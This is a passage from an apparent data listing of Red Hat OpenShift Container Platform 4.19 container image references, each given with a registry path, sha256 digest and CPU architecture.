"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
